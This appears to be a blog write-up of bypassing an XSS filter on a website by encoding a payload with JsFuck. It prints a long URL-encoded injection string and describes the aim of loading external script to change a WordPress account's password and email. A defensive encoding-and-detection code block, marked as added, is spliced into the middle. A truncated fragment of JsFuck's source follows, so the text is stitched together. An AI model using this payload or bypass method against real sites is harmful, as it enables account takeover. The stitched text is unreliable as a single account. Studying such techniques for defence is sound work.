
How I bypassed an XSS filter like a PRO (advanced XSS techniques)

Source: compiled by this site | Author: anonymous | Date: 2019-11-16

A code injection flaw inside JavaScript code is a real headache. Because this was not a penetration test performed for a corporate client, we can publish the technical details directly.
In short, we found a security flaw on a website, and after some time spent analysing the code we located an endpoint with an XSS vulnerability:
http://website.com/dir/subdir
The JavaScript code of that endpoint contained the following call:
function("/DIR/SUBDIR",params);
After scanning with Burp Suite, we found that appending "-alert(1)-" to the URL (http://website.com/dir/subdir/"-alert(1)-") reflects into the script; the browser reported "unable to find function ALERT(1)":

Next, we need to test what exactly the server filters out, for example “”, “//”, “\” or “.”.
Finding a usable payload
We also found some solutions, all of them related to jsfuck.com.

Of course, we could run a plain "alert(1)" on this site, but that is only a low-severity XSS; we wanted to raise the finding to a high or critical severity vulnerability. To do that, we need to load an external JS file and perform arbitrary web actions without any user interaction.
The image below shows a WordPress payload; the goal is to load an external JS file into the target site and change the account password and email address:

Building the JsFuck payload: in JsFuck, a simple "alert(1)" is converted to:
"-%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%5B(%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%5D((!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B
%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D)()(%2B!!%5B%5D)-"
If I wanted "alert(document.cookie)", the full JsFuck code would run to more than 13,000 characters. I found that once the payload exceeds roughly 2500-2700 characters, the target server returns an HTTP 400 error.
Next, let us look at how JsFuck works:
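Two defensive checks for the pattern described above: a URL path reflected into a JavaScript string literal, behind a filter that mangles identifiers (the reflected call comes back as ALERT(1)) but leaves the six JsFuck characters `[]()!+` untouched. This is an added example, not code from the article or the affected site; `fn`, `params`, the sample payload and the detection thresholds are constructed assumptions.

```javascript
// Added example (not from the original article). Two defensive checks for a
// path value reflected into a JS string literal, as in  function("/DIR/SUBDIR", params);

// 1. Hardened reflection: encode the value as a JS string literal instead of
//    filtering characters. JSON.stringify escapes " and \ ; the extra replaces
//    neutralise </script> breakout and the two line terminators that can end a
//    JS literal but are left raw by JSON.stringify.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Renders the call from the article with the path safely embedded
// ('fn' stands in for the real function name, which the page does not give).
function renderCall(path) {
  return 'fn(' + toJsStringLiteral(path) + ', params);';
}

// 2. Detection heuristic: a JsFuck payload is built almost entirely from the
//    six characters [ ] ( ) ! + and runs to thousands of bytes (the article
//    puts alert(document.cookie) at over 13,000), so measure their share.
function jsfuckDensity(s) {
  if (s.length === 0) return 0;
  let n = 0;
  for (const ch of s) if ('[]()!+'.includes(ch)) n++;
  return n / s.length;
}

// Flags a URL-decoded path as suspicious when it is long and dominated by
// those characters. Thresholds are assumptions; tune them on real traffic.
function looksLikeJsfuck(decodedPath, minLen = 64, minDensity = 0.8) {
  return decodedPath.length >= minLen && jsfuckDensity(decodedPath) >= minDensity;
}

// Constructed sample request path in the shape the article shows
// (URL-encoded, wrapped in "-...-" to break out of the string literal).
const SAMPLE_PAYLOAD =
  '/dir/subdir/%22-' + '%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D'.repeat(8) + '-%22';

console.log(renderCall('/dir/subdir/"-alert(1)-"'));              // fn("/dir/subdir/\"-alert(1)-\"", params);
console.log(looksLikeJsfuck(decodeURIComponent(SAMPLE_PAYLOAD)));  // true
```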
const SIMPLE = {
  'false':     '![]',
  'true':      '!0',
  'undefined': '0[0]',
  'NaN':       '+[!0]',
  'Infinity':  '+(+!0+(!0+[])[!0+!0+!0]+[+!0]+[0]+[0]+[0])' // +"1e1000"
};
    const CONSTRUCTORS = {
